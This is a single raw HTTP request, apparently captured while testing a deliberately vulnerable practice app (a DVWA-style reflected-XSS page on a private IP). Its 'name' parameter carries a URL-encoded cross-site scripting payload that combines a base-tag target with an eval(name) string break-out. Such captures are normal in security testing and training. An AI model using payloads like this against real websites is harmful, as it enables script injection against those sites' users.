GET /vulnerabilities/xss_r/?name=%3Cbase+target%3D%22alert%281%29%22%3E%3Ca+href%3D%22http%3A%2F%2Fsubdomain1.portswigger-labs.net%2Fxss%2Fxss.php%3Fcontext%3Djs_string_single%26x%3D%2527%3Beval%28name%29%2F%2F%22%3EXSS+via+target+in+base+tag%3C%2Fa%3E HTTP/1.1
Host: 10.10.3.128:2280
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

